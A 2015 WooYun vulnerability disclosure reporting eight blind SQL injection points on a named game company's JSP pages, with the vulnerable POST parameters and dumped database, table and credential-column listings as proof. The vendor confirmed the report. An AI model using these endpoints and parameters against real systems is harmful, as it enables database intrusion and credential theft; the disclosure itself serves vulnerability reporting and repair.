当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132694

漏洞标题:49you某站多处SQL注入打包

相关厂商:49you.com

漏洞作者: 路人甲

提交时间:2015-08-08 23:08

修复时间:2015-09-27 09:12

公开时间:2015-09-27 09:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-08: 细节已通知厂商并且等待厂商处理中
2015-08-13: 厂商已经确认,细节仅向厂商公开
2015-08-23: 细节向核心白帽子及相关领域专家公开
2015-09-02: 细节向普通白帽子公开
2015-09-12: 细节向实习白帽子公开
2015-09-27: 细节向公众公开

简要描述:

多处注入打包,多参数。
求20RANK

详细说明:

SQL盲注,八处,每一处都有多个参数
第一处,多参数

http://dj.49you.com/web/CPGameManage.jsp
POST参数:
beginTime=-1&cpName=mnxcfwuf&endTime=2015-08-08&gameNamestr=mnxcfwuf
参数beginTime, cpName, endTime, gameNamestr都存在注入


第二处:

http://dj.49you.com/web/cpincome.jsp
POST参数:
beginTime=-1&cbName=pshrldjs&endTime=1&spName=pshrldjs
参数beginTime, cdName, endTime, spName都存在注入


第三处:

http://dj.49you.com/web/cpProvinceList.jsp
POST参数:
beginTime=2015-08-08&cbName=-1&cityName=xdtmdadm&endTime=2015-08-08
参数cbName,cityName都存在注入


第四处:

http://dj.49you.com/web/sy_sjwar_cpincome.jsp
POST参数:
beginTime=-1&endTime=1&spName=htkwbbeq
参数beginTime,endTime,spName都存在注入


第五处:

http://dj.49you.com/web/tab/LyGameIncome.jsp
POST参数:appname=-1&beginTime=2015-08-08&channelName=A0001&endTime=2015-08-08&spname=%e5%8c%97%e4%ba%ac%e5%88%9b%e6%84%8f%e6%af%94%e7%89%b9%e4%bf%a1%e6%81%af%e6%8a%80%e6%9c%af%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8
参数appname,beginTime,channelName,spname都存在注入


第六处

http://dj.49you.com/web/tab/WoGameIncome.jsp
POST参数:
appname=-1&beginTime=2015-08-01&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0028969)&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8&type=%e7%a7%bb%e5%8a%a8MM
参数appname,beginTime,channelName,enTime,spname,type参数都存在注入


第七处:

http://dj.49you.com/web/tab/WoGameIncome0807.jsp
POST参数:
appname=xhofrmpv&beginTime=-1&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0027913)&endTime=2015-08-08&spname=%e6%99%8b%e6%98%b6&type=%e7%a7%bb%e5%8a%a8MM
参数beginTime,enTime,spname,type参数都存在注入


第八处:

http://dj.49you.com/web/tab/WoGameIncome2.jsp
POST参数:
beginTime=2015-08-01&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8
beginTime,endTime,spname参数都存在注入


漏洞证明:

web application technology: Nginx
back-end DBMS: Microsoft SQL Server 2012
current user: 'sp'
current database: 'SP'
current user is DBA: False
available databases [17]:
[*] Administration
[*] blacklist
[*] Company
[*] DataBack
[*] master
[*] model
[*] msdb
[*] new_system
[*] NZIformation
[*] ReportServer
[*] ReportServerTempDB
[*] shouYou
[*] SP
[*] SP2
[*] tempdb
[*] Test
[*] wap_game
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
[108 tables]
+---------------------+
| CityList |
| Ctstats |
| DHXGame_User |
| DXBaoYueZDYJH |
| OnlineProvince |
| PcInterface |
| ProvinceCity |
| ProvinceList |
| amountTable |
| baoyue |
| baoyue2 |
| black_imsi |
| by_send |
| cp_channel |
| cpbaccount |
| cppay |
| cppay_date |
| cppay_pro |
| dx_imsinum_mrtj |
| dx_phonenum_motj |
| dx_phonenum_mrtj |
| dxbaoyuesendrecord |
| dxopencity |
| dxspid |
| fee_request |
| fee_request1 |
| fp |
| fptaxrate |
| game |
| gameIncome |
| gametype |
| gamezhou |
| hourinfo |
| imei |
| importtxt |
| imsi |
| imsi0716 |
| interfaceAgency |
| kftsManage |
| ltgamerecv |
| ltsjyx |
| ltwogame |
| mmLoginInfor |
| mmOrder |
| mmShow |
| mm_list |
| mm_rule |
| mmcompany |
| mmctrl |
| mmqrecv |
| mmrecv |
| monthinformation |
| mosync |
| mrsync |
| newCityList |
| nz_cp |
| pb_cp |
| pcgame |
| pcgameid |
| pcweb |
| pinbi_cp |
| price |
| pro_tj |
| recv_mo |
| recvrecord |
| rules |
| send_mr |
| sendrecord |
| servicetype |
| settlement |
| settlement_back |
| settlement_pro |
| sjqbrecv |
| smsrecv |
| sq_phonenum_tj |
| tb_Day_Stat |
| tb_LINE |
| tb_LyDay_Stat |
| tb_LyDay_Stat0707 |
| tb_LyDay_Stat_0702 |
| tb_SP |
| tb_byDDmo |
| tb_byDDmr |
| tb_informMM |
| tb_monthcalculate |
| tb_spinformation |
| tb_sppay |
| tb_wyurlmanage |
| telimsi |
| telrecv |
| telrecvs |
| temp_send |
| temp_send1 |
| temp_send2 |
| testsendrecord |
| text |
| textlink |
| tj |
| tjOrd2 |
| tjbakbak |
| update_rules_record |
| vbtj |
| vw_rules |
| wjwar |
| wx_Login_Type |
| wx_User |
| xiaoguobiao |
| zxf_cp |
+---------------------+
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
Table: wx_User
[6 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| COMPANY_NAME | varchar |
| ID | int |
| INSERT_TIME | datetime |
| LOGIN_NAME | varchar |
| LOGIN_PASS | varchar |
| TYPE_ID | int |
+--------------+----------+

修复方案:

参数过滤,还有很多XSS,建议系统检查下这个站点。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-13 09:10

厂商回复:

谢谢路人甲,我们这边安排技术处理中

最新状态:

暂无


漏洞评价:

评论